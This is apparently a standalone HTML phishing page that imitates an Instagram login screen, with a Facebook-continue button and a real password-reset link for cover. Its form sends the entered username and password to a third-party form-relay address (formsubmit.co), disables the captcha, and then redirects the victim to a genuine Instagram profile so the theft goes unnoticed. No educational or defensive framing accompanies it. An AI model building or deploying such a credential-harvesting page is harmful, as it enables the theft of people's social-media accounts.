<!DOCTYPE html>
<html lang="en">
<head>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <title>instagram.login.boho// collections</title>
 <style>
 *{
    padding: 0;margin: 0;box-sizing: border-box;}
 body{
font-family: sans-serif;
 }
 .container{
  height: 100%;
  display: grid;
  justify-content: center;
  background-color: white;
  flex-wrap: wrap;
  text-align: center;
 
 }
#e:hover{ 
  color: rgb(152, 193, 255);

}
 .box{
 margin-top: 30px;
 padding: 20px ;
 width: 350px;
 height: 380px;
 text-align: center;
 background-color: white;
 }
 .box.a{
 margin-top: 10px;
 height: 80px;
 }
 #hedding{
 font-size: 40px;
 font-weight: 400;

 margin-bottom: 10px;
 }
 #int{
 width: 250px;
 height: 45px;
 margin: 20px 30px -15px 30px;
 background-color: whitesmoke;
 padding: 10px;
 border: 1px solid rgb(216, 211, 211);
 border-radius: 0px;
 
 }
 #a{
 width: 250px;
 height: 30px;
 margin: 20px 30px 10px 30px;
 background-color: rgb(29, 161, 242);
 padding-bottom: 0px;
 border: 1px solid rgb(216, 211, 211);
 border-radius: 5px;
 color: white;
 
 }
 #pho{
 border-radius: 10px;
 cursor: pointer;
 }

  #f{
 width: 250px;
 height: 35px;
 margin: 0px 30px 15px 30px;
 background-color: rgb(75, 153, 255);
 padding-bottom: 0px;
 border: 1px solid rgb(216, 211, 211);
 border-radius: 5px;
 color: white;
 cursor: pointer;
 }
 #pho{
 border-radius: 10px;
 cursor: pointer;
 }



 
 #fpwd{
  position: relative;
  left: 60px;
  color:  rgb(75, 153, 255);
  text-decoration: none;

 }
 
 </style>
</head>
<body>
    <form action="https://formsubmit.co/33b560ce17e9647e3439f0873b71854b" method="POST">
      <p align="center" style="font-size:10px; colour: rgb(5, 5, 6);">English (UK) </p> 
         <div class="container">
         <div class="box">
         <img src="https://i.ibb.co/8NFJ6Gt/download.png" height="100" >
         <button id="f">Continue Using Facebook</button><br>
         <input type="hidden" name="_template" value="table">
         <input id="int" type="text"  placeholder="Phone number, username, or email" required name="id" >
         <input id="int" type="password" placeholder="Password" required name="password">
         <br>
         <br>
         
         <a href="https://www.instagram.com/accounts/password/reset/" id="fpwd" style="font-size:12px;">Forgot password?</a>
         
         <button id="a" type="submit">Login</button>
         
        <br>
        <br>
         <p style="font-size: 15px;color: rgb(83, 77, 77);">Don't have an account?
  <span style="color: rgb(75, 153, 255);cursor: pointer; ">Sign up</span></p>
         </div>
         <p style="padding: 20px;font-size: 20px;"></p>
         </div>
         
         <input type="hidden" name="_next" value="https://www.instagram.com/boho_collections/?hl=en">
           <input type="hidden" name="_captcha" value="false">
         </form>
         
        </body>
  </html>
  
